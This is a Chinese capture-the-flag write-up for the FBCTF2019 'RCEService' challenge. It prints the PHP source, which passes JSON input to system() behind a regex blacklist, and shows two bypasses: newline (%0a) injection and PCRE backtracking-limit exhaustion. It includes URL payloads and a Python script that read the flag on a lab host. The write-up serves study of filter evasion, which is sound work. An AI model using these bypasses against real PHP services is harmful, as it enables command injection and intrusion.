[FBCTF2019]RCEService1

开始代码审计~

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
    $json = $_REQUEST['cmd'];

    if (!is_string($json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } else {
        echo 'Attempting to run command:<br/>';
        $cmd = json_decode($json, true)['cmd'];
        if ($cmd !== NULL) {
            system($cmd);
        } else {
            echo 'Invalid input';
        }
        echo '<br/><br/>';
    }
}

?>

1. putenv('PATH=/home/rceservice/jail');  配置了一个环境变量，所以我们输入系统命令的时候需要找到它的绝对路径比如/bin/cat .

2. is_string() 说明我们传入的value，必须是字符型.

3. preg_math(),我们需要绕过这个正则表达式,不过它真的好长.

4. json_decode(),说明我们传入的格式为json格式.

5. system(),我们可以通过传入系统命令来找出flag值.

 我们开始进行绕过preg_math()~

 我们可以通过两种姿势来绕过~

 1. %0a 绕过

知识点:

       1 " . "不会匹配换行符(%0a,\n),除非正则表达式后面添加了m(多行模式)选项,或者s选项,可以使 . 可以在单行模式下匹配换行符,如下.

<?php  
$json = "flag"; 
if (preg_match('/^.*(flag).*$/', $json)) { 
    echo 'Hacking attempt detected';  
}  
?>

只需要 $json="\nflag" 

        2 当%0a在末尾时,$似乎会忽略%0a,如下.

if(preg_math('/^flag$/',$_GET['a'])&&$_GET['a']!=='flag'){
    echo $flag;
}

只需传入 ?a=flag%a

开始构造payload~

?cmd={"cmd":"/bin/cat /home/rceservice/flag"%0a}%0a%0a
?cmd=%0a{"cmd":"/bin/cat /home/rceservice/flag"%0a}

2. PCRE回溯绕过

知识点:

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌 (leavesongs.com)

import requests

url='http://ffa3fe84-58c7-4980-bf07-b573c0c5dcdb.node5.buuoj.cn:81/'
data={
    'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","feng":"'+'a'*1000000+'"}'
}
r=requests.post(url=url,data=data).text
print(r)